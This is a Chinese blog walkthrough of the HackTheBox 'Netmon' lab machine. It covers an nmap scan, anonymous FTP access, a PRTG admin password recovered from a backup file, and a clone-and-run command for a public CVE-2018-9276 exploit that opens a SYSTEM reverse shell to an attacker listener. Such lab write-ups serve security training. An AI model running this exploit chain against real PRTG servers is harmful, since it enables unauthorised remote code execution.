HTB-Netmon-Win-CVE-2018-9276

最新推荐文章于 2021-12-20 19:17:00 发布
最新推荐文章于 2021-12-20 19:17:00 发布
阅读量418 收藏
点赞数
分类专栏: htb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/113862866
版权

靶机描述

清单

  • 信息搜集

    • nmap
    • 匿名ftp
    • 获取 .bak (泄露密码)

  • 提权

    • CVE-2018-9276

信息搜集

靶机IP

image-20210218193514788

端口扫描

nmap 10.10.10.152 -A

Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

开放21、80端口

21

其中 21 允许匿名登陆

80

搭建了 image-20210218193641706

尝试弱口令无果

ftp

ftp 登陆后再 Public 目录得到 user.txt

image-20210218193823070

由于没有写入权限,所以入口就能尝试 80 了

在一番寻找后再 中得到了 密码

image-20210218194333742

image-20210218194401995

	      <!-- User: prtgadmin -->
	      PrTg@dmin2018

尝试登陆后,发现登陆失败

image-20210218195035062

在看过wp之后,登陆密码居然是 2019 - -、

注: 有空格的目录需要加引号进入

获取 System

在登陆之后得到了版本信息

image-20210218195259820


Installed Version

18.1.37.13946

github 有相关利用方法

https://github.com/wildkindcc/CVE-2018-9276

git clone https://github.com/wildkindcc/CVE-2018-9276.git

cd CVE-2018-9276

python2 CVE-2018-9276.py -i 10.10.10.152 -p 80 --lhost 10.10.14.30 --lport 2233 --user prtgadmin --password PrTg@dmin2019

得到 Shell

权限为 System

image-20210218195444352

赛博雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB靶场系列 Windows靶机 Legacy靶机
m0_57221101的博客
01-27 1940
勘探 常规nmap扫描 root@kali# nmap 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST Nmap scan report for 10.10.10.4 Host is up (0.018s latency). Not shown: 65532 filtered ports
HTB_Netmon CVE-2018-9276 RCE漏洞复现
网络安全学习
04-20 495
PTRG CVE-2018-9276 RCE漏洞复现
HTB系列】靶机Netmon的渗透测试
大方子
07-11 1669
总结和反思: 1. win中执行powershell的远程代码下载执行注意双引号转义 2. 对powershell代码先转为windows上默认的Unicode编码方式(UTF-16LE)再转为 base64执行,防止代码内容被破坏 3. 学会查CVE漏洞 4. 通过命令行把终端内容保存到剪切板中 5. 运维人员密码修改的规律,仅仅修改了密码中的年份,这是设置新密码常用的思路 K...
HTB:在线主机-Omni
m0_46391769的博客
11-01 345
免责申明:本文仅用于学术讨论,请勿用作非法用途。如有,本人概不负责。 关于本人:我是一名来自测绘行业的小白,最近在想转行所以写博客。(接受实习邀请限‘成都’)为梦想前进,不留遗憾。 HTB:Omni 主机介绍,首先这是一台简单的主句如果你对Powershell有一定的了解那么移动不会觉得很难,但是Powershell对于平常一般人来说始终像天书一样。对。所以建议还是可以学习一些关于powershell的知识。 首先还是老规矩: Port Version 135 RPC 8080 HT
2021-10-074号靶场转自y神的学习笔记(net渗透,sockcap,msf多重网段渗透,os-shell,验证码重放,C#解密,wfuzz穷举subdomain)
qq_45290991的博客
10-07 2332
masscan扫描 kali@kali:~$ sudo masscan -p 1-65535 192.168.0.134 --rate=1000 [sudo] kali 的密码: Starting masscan 1.0.5 (http://bit.ly/14GZzc...
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
网络安全渗透测试实验
weixin_45807596的博客
12-20 264
网络安全渗透测试实验 一、环境搭建 网络拓扑图 Web服务器一: 10.10.10.129 192.168.126.128 数据库服务器: 10.10.10.136 10.10.1.134 Kali攻击机: 192.168.129.129 1、Web服务器一: ①基本信息 操作系统:Windows Server 2008 R2 网站管理:护卫神主机大师 webserve...
HackTheBox-Netmon渗透测试
weixin_43111940的博客
04-13 209
端口信息 sudo nmap -sC -sV -p 21,80,135,139,445 10.10.10.152 匿名登陆ftp 拿到user.txt,提交 从网上查到PRTG/18.1.37这个cms是存在RCE漏洞的 https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2018-9276 也有对应的exp https://github.com/wildkindcc/CVE-2018-9276 但是需要账号.
No.1-Bastion-难度简单-HTB-walkthrough
weixin_43851945的博客
01-10 1874
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体...
曲速未来揭示 :新的CVE-2018-8373在野外发现漏洞利用
WarpFuture的博客
09-26 1067
区块链安全咨询公司 曲速未来 消息:在9月18日,也就是在Trend Micro研究人员发布分析UAF漏洞CVE-2018-8373的文章后一个月,又发现了一个影响VBScript引擎的新版Windows版本的免费使用(UAF)漏洞CVE-2018-8373的细节,然后发现了另一个漏洞,也是在野外使用相同的漏洞。请注意,此漏洞利用程序不适用于具有更新的Internet Explorer版本的系统。...
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4064
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权(提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
CVE-2018-8420 漏洞复现
andiao1218的博客
12-21 831
影响的 Windows 版本: Microsoft Windows 10 Version 1607 for 32-bit SystemsMicrosoft Windows 10 Version 1607 for x64-based SystemsMicrosoft Windows 10 Version 1803 for 32-bit SystemsMicrosoft Windows 1...
CVE-2018-8120漏洞复现(提权)
qq_46258964的博客
10-14 1873
最好用的提权漏洞CVE-2018-8120 漏洞描述 部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码 影响版本 Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit System
HTB系列】靶机Bitlab的渗透测试
Ms08067安全实验室
02-07 804
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀0x00 本文目录反思与总结基本信息渗透测试过程补充0x01 反思与总结1.curl发送GET参数化请求 2.对反弹回来的s...
CVE-2023-4016
最新发布
08-17
很抱歉,我没有找到与您提到的CVE-2023-4016相关的引用资料。是否有其他问题我可以帮助您解答?<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* [HTB...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值